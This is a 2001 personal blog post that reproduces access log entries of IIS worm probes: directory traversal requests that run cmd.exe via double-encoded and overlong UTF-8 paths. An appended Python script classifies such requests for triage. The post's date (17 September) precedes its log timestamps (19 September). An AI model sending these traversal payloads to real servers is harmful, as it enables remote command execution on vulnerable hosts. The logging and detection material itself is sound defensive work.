Sake Diary

Mon, 17 Sep 2001

Akiaji (6% × 1000 ml)

Starting a little after 10 p.m. today, strange accesses shot up.

63.149.*.* - - [19/Sep/2001:04:09:53 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:54 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:54 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:55 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:55 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:56 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:57 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:57 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:58 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:58 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:59 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:09:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:00 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:00 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:01 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
63.149.*.* - - [19/Sep/2001:04:10:01 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

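They leave log entries like these. They seem to be aimed at IIS. They show up every few minutes or so, and it is incredibly annoying.

Looking into it, this apparently is what CERT/CC Current Activity is warning about. Good grief. And mixed in with these, Code Red shows up now and then too. Most of the accesses to my site (sake-nikki.dyndns.org) being worms, what is that about (lol)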
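An added example, not part of the original post: a small triage script for access logs like the one above. It percent-decodes each request target once and twice and tags the tricks visible in those requests (shell binary names, `..` traversal, double encoding such as `%255c`, and overlong UTF-8 bytes such as `%c0%af`). The names `classify` and `summarize`, the trait labels, and the sample lines are assumptions made for this illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Apache combined log format; only the client host and request target are used.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3} ')
SHELL = re.compile(rb'(?:cmd|root)\.exe', re.I)
TRAVERSAL = re.compile(rb'\.\.[\\/]')
OVERLONG = re.compile(rb'[\xc0\xc1]')  # lead bytes that never occur in valid UTF-8

def classify(target):
    """Return the suspicious traits of one request target (path + query)."""
    once = unquote_to_bytes(target)   # a single, standards-conforming decode
    twice = unquote_to_bytes(once)    # what a double-decoding server would see
    traits = set()
    if SHELL.search(twice):
        traits.add("shell-binary")
    if TRAVERSAL.search(twice):
        traits.add("traversal")
    if twice != once:                 # escapes survived the first decode
        traits.add("double-encoding")
    if OVERLONG.search(once):
        traits.add("overlong-utf8")
    return traits

def summarize(lines):
    """Count traits per client host; lines that do not parse are skipped."""
    hosts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, target = m.groups()
        hosts.setdefault(host, Counter()).update(classify(target))
    return hosts

# Constructed sample lines (hosts taken from the documentation range 192.0.2.0/24).
SAMPLE = [
    '192.0.2.10 - - [19/Sep/2001:04:09:53 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"',
    '192.0.2.10 - - [19/Sep/2001:04:09:55 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"',
    '192.0.2.10 - - [19/Sep/2001:04:09:59 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"',
    '192.0.2.10 - - [19/Sep/2001:04:10:00 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"',
    '192.0.2.77 - - [19/Sep/2001:04:11:12 +0900] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for host, counts in summarize(SAMPLE).items():
        print(host, dict(counts))
```

Hosts whose counters stay empty made only ordinary requests; a host with many tagged requests in a short window is a candidate for blocking or for exclusion from traffic statistics.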
